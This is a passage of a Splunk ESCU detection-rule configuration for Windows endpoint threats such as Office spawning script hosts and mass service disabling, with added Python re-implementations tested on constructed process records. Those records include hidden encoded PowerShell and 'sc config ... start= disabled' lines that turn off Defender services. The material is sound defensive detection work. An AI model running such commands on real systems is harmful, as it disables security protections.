"impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1566.001", "T1059.005", "T1059.007"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies Microsoft Excel spawning Windows Script Host, `cscript.exe` or `wscript.exe`. This is not typical or default behavior for Excel.exe. 
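The two Excel searches above differ only in the child they look for, and the PowerShell one also groups on `original_file_name` (through the `process_powershell` macro) so a renamed PowerShell binary is still caught. The following Python is an added example, not ESCU or Splunk code, that applies both rules to constructed Endpoint.Processes-style records and groups the hits the way the searches' `by` clause with `count`, `min(_time)`, `max(_time)` and `values(process)` does. The name sets used for PowerShell are an assumption about what the macro matches; check your installed copy.

```python
"""Added example: Excel -> PowerShell / Windows Script Host parent-child
detection over constructed Endpoint.Processes-style records. Not ESCU code."""
import ntpath
from collections import OrderedDict

# Assumed contents of the `process_powershell` macro (verify against your copy):
# match on image name OR on the PE OriginalFileName so renamed binaries still hit.
PS_NAMES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe", "sqlps.exe", "sqltoolsps.exe"}
PS_ORIGINAL_FILE_NAMES = {"powershell.exe", "pwsh.dll", "powershell_ise.exe"}
WSH_NAMES = {"cscript.exe", "wscript.exe"}
OFFICE_PARENTS = {"excel.exe"}  # add winword.exe etc. to generalize beyond the two searches


def basename(image):
    """CIM process_name is a bare file name, but be tolerant of full paths."""
    return ntpath.basename(image or "").lower()


def is_powershell(rec):
    return (basename(rec["process_name"]) in PS_NAMES
            or (rec.get("original_file_name") or "").lower() in PS_ORIGINAL_FILE_NAMES)


def is_wsh(rec):
    return basename(rec["process_name"]) in WSH_NAMES


RULES = [
    ("Excel Spawning PowerShell", is_powershell),
    ("Excel Spawning Windows Script Host", is_wsh),
]


def classify(rec):
    """Return the rule name a record triggers, or None."""
    if basename(rec["parent_process_name"]) not in OFFICE_PARENTS:
        return None
    for name, predicate in RULES:
        if predicate(rec):
            return name
    return None


def detect(records):
    """Group hits like `... by parent_process_name process_name user dest` with
    count, min(_time) as firstTime, max(_time) as lastTime and values(process)."""
    notables = OrderedDict()
    for rec in records:
        rule = classify(rec)
        if rule is None:
            continue
        key = (rule, rec["dest"], rec["user"],
               basename(rec["parent_process_name"]), basename(rec["process_name"]))
        n = notables.setdefault(key, {"count": 0, "firstTime": rec["_time"],
                                      "lastTime": rec["_time"], "process": []})
        n["count"] += 1
        n["firstTime"] = min(n["firstTime"], rec["_time"])
        n["lastTime"] = max(n["lastTime"], rec["_time"])
        if rec["process"] not in n["process"]:
            n["process"].append(rec["process"])
    return notables


# Constructed sample records; "SQBFAFgA" is the UTF-16LE base64 of "IEX".
T0 = 1700000000
SAMPLE_PROCESSES = [
    {"_time": T0, "dest": "ws01", "user": "CORP\\alice",
     "parent_process_name": "excel.exe", "process_name": "powershell.exe",
     "original_file_name": "PowerShell.EXE",
     "process": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"_time": T0 + 10, "dest": "ws01", "user": "CORP\\alice",
     "parent_process_name": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "process_name": "powershell.exe", "original_file_name": "PowerShell.EXE",
     "process": "powershell.exe -nop -w hidden -c Start-Sleep 1"},
    {"_time": T0 + 20, "dest": "ws01", "user": "CORP\\alice",
     "parent_process_name": "excel.exe", "process_name": "svchost.exe",   # renamed PowerShell
     "original_file_name": "PowerShell.EXE",
     "process": "svchost.exe -nop -w hidden -enc SQBFAFgA"},
    {"_time": T0 + 30, "dest": "ws02", "user": "CORP\\bob",
     "parent_process_name": "excel.exe", "process_name": "wscript.exe",
     "original_file_name": "wscript.exe",
     "process": r"wscript.exe C:\Users\bob\AppData\Local\Temp\invoice.vbs"},
    {"_time": T0 + 40, "dest": "ws02", "user": "CORP\\bob",
     "parent_process_name": "explorer.exe", "process_name": "cscript.exe",
     "original_file_name": "cscript.exe",
     "process": r"cscript.exe C:\Scripts\logon.vbs"},                        # not from Excel
]

if __name__ == "__main__":
    for key, agg in detect(SAMPLE_PROCESSES).items():
        print(key, agg)
```

The third record is why `original_file_name` matters: a PowerShell binary copied to `svchost.exe` still carries `PowerShell.EXE` in its version resource, so the rule fires on it while a pure `process_name` match would miss it. The fifth record shows the parent check doing its job: `cscript.exe` from Explorer is ordinary logon-script activity and produces nothing.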
Excel.exe is generally found under `C:\Program Files\Microsoft Office\root\Office16` (the version folder will vary). `cscript.exe` and `wscript.exe` are located by default in `c:\windows\system32\` or `c:\windows\syswow64\`. `cscript.exe` or `wscript.exe` spawning from Excel.exe is a common and actively used pattern for malicious spearphishing attachments. The command line executed will most likely be obfuscated and captured by another detection. During triage, review parallel processes and identify any files that may have been written. Review the reputation of the remote destination and block accordingly. action.notable.param.rule_title = Excel Spawning Windows Script Host action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name="excel.exe" Processes.process_name IN ("cscript.exe", "wscript.exe") by Processes.parent_process Processes.parent_process_name Processes.process_name Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)` | `excel_spawning_windows_script_host_filter` [ESCU - Excessive Attempt To Disable Services - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a suspicious series of command lines that disable several services within a short window. This technique is seen where an adversary disables security product services, or the services of competing malware, to complete its objective on the compromised system. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies a suspicious series of command lines that disable several services within a short window. This technique is seen where an adversary disables security product services, or the services of competing malware, to complete its objective on the compromised system. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-05-04 action.escu.modification_date = 2021-05-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive Attempt To Disable Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Azorult"] action.risk = 1 action.risk.param._risk_message = An excessive amount of $process_name$ was executed on $dest$ attempting to disable services. 
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive Attempt To Disable Services - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Azorult"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "sc.exe" AND (Processes.process="*config*" OR Processes.process="*Disabled*") by Processes.process_name Processes.parent_process_name Processes.dest Processes.user _time span=1m | where count >=4 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_attempt_to_disable_services_filter` [ESCU - Excessive distinct processes from Windows Temp - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will identify suspicious series of process executions. We have observed that post exploit framework tools like Koadic and Meterpreter will launch an excessive number of processes with distinct file paths from Windows\Temp to execute actions on objective. This behavior is extremely anomalous compared to typical application behaviors that use Windows\Temp. 
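Both "Excessive Attempt To Disable Services" and "Excessive distinct processes from Windows Temp" are threshold-over-time-bucket detections: tstats groups by `_time span=1m` (or `span=20m` for the Temp search) and a `where` on the count (`>=4`, or `distinct_count > 37`) follows. The following Python is an added example, not ESCU or Splunk code, that implements both over constructed Endpoint.Processes-style records. It uses the parenthesised form of the sc.exe condition, `process_name="sc.exe" AND (process="*config*" OR process="*Disabled*")`, so a decoy record whose command line merely contains "Disabled" is not counted; thresholds and span lengths are taken from the searches, and the host names, users and service names in the sample are made up.

```python
"""Added example: time-bucketed threshold detections in the style of
'Excessive Attempt To Disable Services' and 'Excessive distinct processes
from Windows Temp', over constructed Endpoint.Processes-style records."""
import re
from collections import defaultdict


def bucket(ts, span_seconds):
    """What `_time span=1m` / `span=20m` does in tstats: floor to the bucket start."""
    return ts - (ts % span_seconds)


def is_sc_disable(rec):
    """Parenthesised on purpose: written as `A AND B OR C` the search counts any
    process whose command line contains 'Disabled', not only sc.exe."""
    cmd = rec["process"].lower()
    return rec["process_name"].lower() == "sc.exe" and ("config" in cmd or "disabled" in cmd)


def excessive_sc_disable(records, threshold=4, span=60):
    """(dest, user, bucket_start) -> count, for buckets with >= threshold sc.exe calls."""
    counts = defaultdict(int)
    for rec in records:
        if is_sc_disable(rec):
            counts[(rec["dest"], rec["user"], bucket(rec["_time"], span))] += 1
    return {k: c for k, c in counts.items() if c >= threshold}


_TEMP = re.compile(r"\\windows\\temp\\", re.IGNORECASE)


def excessive_temp_processes(records, threshold=37, span=1200):
    """(dest, user, bucket_start) -> distinct command lines run from \\Windows\\Temp,
    for buckets where that distinct count exceeds the threshold."""
    distinct = defaultdict(set)
    for rec in records:
        if _TEMP.search(rec.get("process_path", "")):
            distinct[(rec["dest"], rec["user"], bucket(rec["_time"], span))].add(rec["process"])
    return {k: len(v) for k, v in distinct.items() if len(v) > threshold}


def build_samples():
    """Constructed records. T0 is a 1-minute bucket boundary (T0 % 60 == 0)."""
    t0 = 1700000040
    recs = []
    services = ["WinDefend", "wuauserv", "MsMpSvc", "Sense", "WdNisSvc"]
    for i, svc in enumerate(services):                      # ws01: 5 sc config in 50 s -> hit
        recs.append({"_time": t0 + 10 * i, "dest": "ws01", "user": "CORP\\alice",
                     "process_name": "sc.exe", "process_path": r"C:\Windows\System32\sc.exe",
                     "process": f"sc config {svc} start= disabled"})
    for i in range(2):                                      # ws02: only 2 -> below threshold
        recs.append({"_time": t0 + 10 * i, "dest": "ws02", "user": "CORP\\bob",
                     "process_name": "sc.exe", "process_path": r"C:\Windows\System32\sc.exe",
                     "process": "sc config Spooler start= disabled"})
    for i in range(5):                                      # ws03: decoy, not sc.exe
        recs.append({"_time": t0 + 10 * i, "dest": "ws03", "user": "CORP\\carol",
                     "process_name": "notepad.exe", "process_path": r"C:\Windows\System32\notepad.exe",
                     "process": r"notepad.exe C:\Users\carol\Disabled.txt"})
    for i in range(40):                                     # ws01: 40 distinct Temp binaries in ~3 min -> hit
        recs.append({"_time": t0 + 5 * i, "dest": "ws01", "user": "CORP\\alice",
                     "process_name": f"stage{i}.exe",
                     "process_path": rf"C:\Windows\Temp\stage{i}.exe",
                     "process": rf"C:\Windows\Temp\stage{i}.exe"})
    for i in range(10):                                     # ws02: 10 -> below threshold
        recs.append({"_time": t0 + 5 * i, "dest": "ws02", "user": "CORP\\bob",
                     "process_name": f"tool{i}.exe",
                     "process_path": rf"C:\Windows\Temp\tool{i}.exe",
                     "process": rf"C:\Windows\Temp\tool{i}.exe"})
    return recs


SAMPLES = build_samples()

if __name__ == "__main__":
    print(excessive_sc_disable(SAMPLES))
    print(excessive_temp_processes(SAMPLES))
```

One property of fixed buckets worth knowing before tuning thresholds: a burst that straddles a bucket boundary is split in two, so five `sc config` calls spread across 00:59 and 01:01 can land as 3 + 2 and never reach the threshold. That is how `span=1m` behaves in the search as well; a sliding window would catch it, at the cost of not being expressible as a single tstats `by _time span` clause.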
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic will identify suspicious series of process executions. We have observed that post exploit framework tools like Koadic and Meterpreter will launch an excessive number of processes with distinct file paths from Windows\Temp to execute actions on objective. This behavior is extremely anomalous compared to typical application behaviors that use Windows\Temp. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Many benign applications will create processes from executables in Windows\Temp, although unlikely to exceed the given threshold. Filter as needed. 
action.escu.creation_date = 2022-02-28 action.escu.modification_date = 2022-02-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive distinct processes from Windows Temp - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Meterpreter"] action.risk = 1 action.risk.param._risk_message = Multiple processes were executed out of windows\temp within a short amount of time on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive distinct processes from Windows Temp - Rule action.correlationsearch.annotations = {"analytic_story": ["Meterpreter"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process distinct_count(Processes.process) as distinct_process_count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_path = "*\\Windows\\Temp\\*" by Processes.dest Processes.user _time span=20m | where distinct_process_count > 37 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | 
`excessive_distinct_processes_from_windows_temp_filter` [ESCU - Excessive File Deletion In WinDefender Folder - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies excessive file deletion events in the Windows Defender folder. This technique was observed in the WhisperGate malware campaign, where adversaries exploited Nirsoft's advancedrun.exe to gain administrative privileges and then executed PowerShell commands to delete files within the Windows Defender application folder. Such behavior is a strong indicator that the offending process is attempting to corrupt a Windows Defender installation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies excessive file deletion events in the Windows Defender folder. This technique was observed in the WhisperGate malware campaign, where adversaries exploited Nirsoft's advancedrun.exe to gain administrative privileges and then executed PowerShell commands to delete files within the Windows Defender application folder. Such behavior is a strong indicator that the offending process is attempting to corrupt a Windows Defender installation. action.escu.how_to_implement = To successfully implement this search, you must ingest logs that include the process name, TargetFilename, and ProcessID executions from your endpoints. If you are utilizing Sysmon, ensure you have at least version 2.0 of the Sysmon TA installed. action.escu.known_false_positives = Windows Defender AV updates may trigger this alert. Please adjust the filter macros to mitigate false positives. 
action.escu.creation_date = 2024-03-05 action.escu.modification_date = 2024-03-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive File Deletion In WinDefender Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Data Destruction", "WhisperGate", "BlackByte Ransomware"] action.risk = 1 action.risk.param._risk_message = Excessive file deletion events were detected in the Windows Defender folder on $dest$ by $user$. Investigate further to determine if this activity is malicious. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"threat_object_field": "deleted_files", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive File Deletion In WinDefender Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "WhisperGate", "BlackByte Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies excessive file deletion events in the Windows Defender folder. This technique was observed in the WhisperGate malware campaign, where adversaries exploited Nirsoft's advancedrun.exe to gain administrative privileges and then executed PowerShell commands to delete files within the Windows Defender application folder. 
Such behavior is a strong indicator that the offending process is attempting to corrupt a Windows Defender installation. action.notable.param.rule_title = Excessive File Deletion In WinDefender Folder action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode IN ("23","26") TargetFilename = "*\\ProgramData\\Microsoft\\Windows Defender\\*" | stats count, values(TargetFilename) as deleted_files, min(_time) as firstTime, max(_time) as lastTime by user, dest, signature, signature_id, Image, process_name, process_guid | rename Image as process | where count >=50 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_file_deletion_in_windefender_folder_filter` [ESCU - Excessive number of service control start as disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection targets behaviors observed when threat actors have used sc.exe to modify services. We observed malware in a honey pot spawning numerous sc.exe processes in a short period of time, presumably to impair defenses, possibly to block others from compromising the same machine. This detection alerts when an excessive number of distinct sc.exe command lines (eight or more within 30 minutes) set the start type of services to disabled. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This detection targets behaviors observed when threat actors have used sc.exe to modify services. We observed malware in a honey pot spawning numerous sc.exe processes in a short period of time, presumably to impair defenses, possibly to block others from compromising the same machine. 
This detection alerts when an excessive number of distinct sc.exe command lines (eight or more within 30 minutes) set the start type of services to disabled. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate programs and administrators will execute sc.exe with the start= disabled flag. It is possible, but unlikely based on the telemetry of normal Windows operation we observed, that sc.exe will be called with eight or more distinct command lines in a short period of time. action.escu.creation_date = 2021-06-25 action.escu.modification_date = 2021-06-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive number of service control start as disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics"] action.risk = 1 action.risk.param._risk_message = An excessive number of $process_name$ executions attempting to disable services was observed on $dest$. 
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive number of service control start as disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` distinct_count(Processes.process) as distinct_cmdlines values(Processes.process_id) as process_ids min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes WHERE Processes.process_name = "sc.exe" AND Processes.process="*start= disabled*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_id, _time span=30m | where distinct_cmdlines >= 8 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_number_of_service_control_start_as_disabled_filter` [ESCU - Excessive number of taskhost processes - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection targets behaviors observed in post exploit kits like Meterpreter and Koadic that are run in memory. We have observed that these tools must invoke an excessive number of taskhost.exe and taskhostex.exe processes to complete various actions (discovery, lateral movement, etc.). 
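Both sc.exe rules above ("Excessive Attempt To Disable Services" and "Excessive number of service control start as disabled") reduce to one mechanism: bucket process events by host, user and process name into a fixed span, count raw or distinct command lines, and compare against a threshold. The Python below is an added example, not ESCU content or Splunk code; it re-implements that mechanism over constructed Endpoint.Processes-style events so the two rules can be exercised offline, and it shows why the AND/OR mixture in the first rule's WHERE clause has to be parenthesised: SPL's AND binds tighter than OR, exactly as Python's `and` binds tighter than `or`, so without parentheses any process whose command line contains "Disabled" matches regardless of process name. Host names, user names, service names and timestamps are constructed; lower-casing the command line before matching is an assumption of this example.

```python
"""Fixed-span, fixed-threshold process-event counting.

Added example; not ESCU content or Splunk code. It re-implements, in Python,
what the two sc.exe tstats searches express with `_time span=1m` / `span=30m`,
`where count >= 4` and `where distinct_cmdlines >= 8`, and it shows why the
AND/OR mixture in the WHERE clause must be parenthesised. All events below
(hosts, users, service names, timestamps) are constructed.
"""
from collections import defaultdict


def bucket_start(ts, span_seconds):
    """Floor a Unix timestamp to its span boundary (`_time span=Xm` in tstats)."""
    return ts - (ts % span_seconds)


def bucketed_counts(events, predicate, keys, span_seconds, distinct_field=None):
    """Group events matching `predicate` by `keys` plus a time bucket.

    Returns {(*key_values, bucket_start): n}, where n is the raw event count
    (`count`) or, with `distinct_field`, the number of distinct values of that
    field (`distinct_count(Processes.process)`).
    """
    groups = defaultdict(list)
    for ev in events:
        if predicate(ev):
            key = tuple(ev[k] for k in keys) + (bucket_start(ev["_time"], span_seconds),)
            groups[key].append(ev)
    return {
        key: len({e[distinct_field] for e in evs}) if distinct_field else len(evs)
        for key, evs in groups.items()
    }


GROUP_KEYS = ("dest", "user", "process_name")


# Rule: Excessive Attempt To Disable Services (span 1m, count >= 4)
def sc_config_or_disabled(ev):
    """sc.exe AND (config OR disabled). Command lines are lower-cased so the
    match does not depend on how the EDR records argument case (an assumption
    of this example, not of the SPL)."""
    p = ev["process"].lower()
    return ev["process_name"] == "sc.exe" and ("config" in p or "disabled" in p)


def sc_config_or_disabled_unparenthesised(ev):
    """The same three terms without parentheses. `and` binds tighter than `or`
    in Python just as AND binds tighter than OR in SPL, so this reads as
    (sc.exe AND config) OR disabled: any process with "disabled" on its command
    line matches, whatever its name."""
    p = ev["process"].lower()
    return ev["process_name"] == "sc.exe" and "config" in p or "disabled" in p


def rule_disable_services(events, threshold=4, span_seconds=60, predicate=sc_config_or_disabled):
    counts = bucketed_counts(events, predicate, GROUP_KEYS, span_seconds)
    return {k: n for k, n in counts.items() if n >= threshold}


# Rule: Excessive number of service control start as disabled (span 30m, distinct >= 8)
def sc_start_disabled(ev):
    return ev["process_name"] == "sc.exe" and "start= disabled" in ev["process"].lower()


def rule_start_disabled(events, threshold=8, span_seconds=30 * 60):
    counts = bucketed_counts(events, sc_start_disabled, GROUP_KEYS, span_seconds,
                             distinct_field="process")
    return {k: n for k, n in counts.items() if n >= threshold}


# --- constructed sample telemetry (Endpoint.Processes fields only) ---------
T0 = 1_700_000_040  # constructed Unix time, minute-aligned
SERVICES = ["WinDefend", "Sense", "wscsvc", "MsMpSvc", "SecurityHealthService",
            "wuauserv", "BITS", "EventLog", "TrustedInstaller"]


def _proc(ts, dest, user, name, cmdline):
    return {"_time": ts, "dest": dest, "user": user, "process_name": name, "process": cmdline}


SAMPLE_EVENTS = (
    # ws01: nine different services disabled within one minute -> both rules fire
    [_proc(T0 + i, "ws01", "SYSTEM", "sc.exe", f"sc config {s} start= disabled")
     for i, s in enumerate(SERVICES)]
    # ws02: one identical command repeated once a minute for ten minutes ->
    # never four in one minute, and distinct_count over 30m is 1 -> neither fires
    + [_proc(T0 + 60 * i, "ws02", "admin", "sc.exe", "sc config Spooler start= disabled")
       for i in range(10)]
    # ws03: five PowerShell runs with "Disabled" on the command line, not sc.exe
    + [_proc(T0 + i, "ws03", "admin", "powershell.exe",
             "Set-Service -Name Spooler -StartupType Disabled") for i in range(5)]
)


if __name__ == "__main__":
    print("disable services:", rule_disable_services(SAMPLE_EVENTS))
    print("start= disabled :", rule_start_disabled(SAMPLE_EVENTS))
    print("unparenthesised :",
          rule_disable_services(SAMPLE_EVENTS, predicate=sc_config_or_disabled_unparenthesised))
```

With the parenthesised predicate only ws01 fires; the unparenthesised form also fires on ws03's PowerShell runs, which is the false-positive class an un-bracketed WHERE clause produces. ws02 illustrates the difference between `count` and `distinct_count`: ten executions of one identical command line never reach the distinct threshold, which is why the 30-minute rule tolerates a script that retries the same change.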
It is extremely uncommon in the course of normal operations to see so many distinct taskhost and taskhostex processes running concurrently in a short time frame. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This detection targets behaviors observed in post exploit kits like Meterpreter and Koadic that are run in memory. We have observed that these tools must invoke an excessive number of taskhost.exe and taskhostex.exe processes to complete various actions (discovery, lateral movement, etc.). It is extremely uncommon in the course of normal operations to see so many distinct taskhost and taskhostex processes running concurrently in a short time frame. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators, administrative actions or certain applications may run many instances of taskhost and taskhostex concurrently. Filter as needed. 
action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive number of taskhost processes - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Meterpreter"] action.risk = 1 action.risk.param._risk_message = An excessive number of taskhost.exe and taskhostex.exe processes was executed on $dest$, indicative of suspicious behavior. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive number of taskhost processes - Rule action.correlationsearch.annotations = {"analytic_story": ["Meterpreter"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process_id) as process_ids min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes WHERE Processes.process_name = "taskhost.exe" OR Processes.process_name = "taskhostex.exe" BY Processes.dest Processes.process_name _time span=1h | `drop_dm_object_name(Processes)` | eval pid_count=mvcount(process_ids) | eval taskhost_count_=if(process_name == "taskhost.exe", pid_count, 0) | eval taskhostex_count_=if(process_name == 
